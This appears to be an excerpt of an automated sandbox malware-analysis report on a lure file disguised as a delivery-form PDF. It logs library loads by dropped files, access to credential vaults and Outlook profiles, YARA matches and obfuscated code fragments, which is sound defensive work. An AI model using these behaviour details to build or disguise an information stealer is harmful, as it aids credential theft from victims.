                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: wkscli.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: mlang.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: winsqlite3.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: vaultcli.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\proquota.exe | Section loaded: userenv.dll
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | Section loaded: wininet.dll
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | Section loaded: mswsock.dll
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | Section loaded: dnsapi.dll
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | Section loaded: iphlpapi.dll
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Program Files (x86)\VyqasjVIktLyCOkOpPnStgpHfiYuimzjGjavSwvinxUoOHsYvtHdswvngucpUBaOSo\IzFuULsBXSkS.exe | Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\proquota.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Static file information: File size 1444352 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.000000002076F000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.2029094698.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981506313.000000000096F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IzFuULsBXSkS.exe, 0000000F.00000000.2070567197.000000000065E000.00000002.00000001.01000000.00000008.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2915198433.000000000065E000.00000002.00000001.01000000.00000008.sdmp, IzFuULsBXSkS.exe, 00000013.00000000.2282039562.000000000065E000.00000002.00000001.01000000.00000008.sdmp
                      Source: Binary string: easinvoker.pdb source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.0000000002490000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.0000000020715000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.00000000206BD000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdbGCTL source: dxobknwL.pif, 00000003.00000003.2176285189.0000000029BC6000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2116970264.0000000029BBD000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284092805.0000000031937000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000003.2232935002.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2915912076.00000000012C8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: dxobknwL.pif, 00000003.00000002.2212688667.000000002A1AE000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2016612330.0000000029E60000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2004506026.0000000029CB2000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000003.2152236141.0000000031BE7000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000003.2150368787.0000000031A37000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031D90000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031F2E000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2231437286.000000001C495000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C640000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C7DE000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2227625796.000000001C2EB000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2176534366.0000000004144000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.000000000463E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2211652252.00000000042FA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.00000000044A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2264655015.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2266516856.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.000000000533E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: dxobknwL.pif, dxobknwL.pif, 00000008.00000003.2152236141.0000000031BE7000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000003.2150368787.0000000031A37000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031D90000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284199383.0000000031F2E000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2231437286.000000001C495000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C640000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000002.2248152360.000000001C7DE000.00000040.00001000.00020000.00000000.sdmp, dxobknwL.pif, 0000000E.00000003.2227625796.000000001C2EB000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2176534366.0000000004144000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.000000000463E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000010.00000003.2211652252.00000000042FA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000010.00000002.2455960402.00000000044A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2264655015.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2266516856.0000000004FFA000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.2271994780.000000000533E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdb source: dxobknwL.pif, 00000003.00000003.2176285189.0000000029BC6000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000003.00000003.2116970264.0000000029BBD000.00000004.00000020.00020000.00000000.sdmp, dxobknwL.pif, 00000008.00000002.2284092805.0000000031937000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 0000000F.00000003.2232935002.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, IzFuULsBXSkS.exe, 00000011.00000002.2915912076.00000000012C8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1768171604.0000000021672000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.0000000002490000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1768171604.00000000216A1000.00000004.00000020.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000003.1877951872.0000000000601000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.0000000020715000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000003.1877951872.0000000000632000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 00000005.00000002.1980024689.00000000206BD000.00000004.00001000.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981194453.000000000093A000.00000004.00000020.00020000.00000000.sdmp, Lwnkboxd.PIF, 0000000B.00000003.1981194453.0000000000911000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Unpacked PE file: 3.2.dxobknwL.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Unpacked PE file: 8.2.dxobknwL.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\dxobknwL.pif | Unpacked PE file: 14.2.dxobknwL.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: Yara match | File source: 0.2.Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe.23a67a8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe.2930000.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.Lwnkboxd.PIF.23265a8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe.23a67a8.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.Lwnkboxd.PIF.23265a8.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.1782801649.00000000023A6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1821232938.000000007FB80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.1919328602.0000000002326000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: dxobknwL.pif.0.dr | Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_029487A0 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_029487A0
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0295C2FC push 0295C367h; ret 0_2_0295C35F
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_029332FC push eax; ret 0_2_02933338
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0293635A push 029363B7h; ret 0_2_029363AF
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0293635C push 029363B7h; ret 0_2_029363AF
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0295C0AC push 0295C125h; ret 0_2_0295C11D
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0295C1F8 push 0295C288h; ret 0_2_0295C280
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0295C144 push 0295C1ECh; ret 0_2_0295C1E4
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_029486C0 push 02948702h; ret 0_2_029486FA
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0293673E push 02936782h; ret 0_2_0293677A
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_02936740 push 02936782h; ret 0_2_0293677A
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0293C4F4 push ecx; mov dword ptr [esp], edx 0_2_0293C4F9
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0294E5B4 push ecx; mov dword ptr [esp], edx 0_2_0294E5B9
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0293D528 push 0293D554h; ret 0_2_0293D54C
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0293CB56 push 0293CCFAh; ret 0_2_0293CCF2
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0293CB74 push 0293CCFAh; ret 0_2_0293CCF2
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0295BB6C push 0295BD94h; ret 0_2_0295BD8C
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_02947894 push 02947911h; ret 0_2_02947909
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_029468D0 push 0294697Bh; ret 0_2_02946973
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_029468CE push 0294697Bh; ret 0_2_02946973
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_02948916 push 02948950h; ret 0_2_02948948
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_02948918 push 02948950h; ret 0_2_02948948
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_0294A920 push 0294A958h; ret 0_2_0294A950
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_02942EE8 push 02942F5Eh; ret 0_2_02942F56
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_02945E04 push ecx; mov dword ptr [esp], edx 0_2_02945E06
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_02942FF4 push 02943041h; ret 0_2_02943039
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe | Code function: 0_2_02942FF3 push 02943041h; ret 0_2_02943039
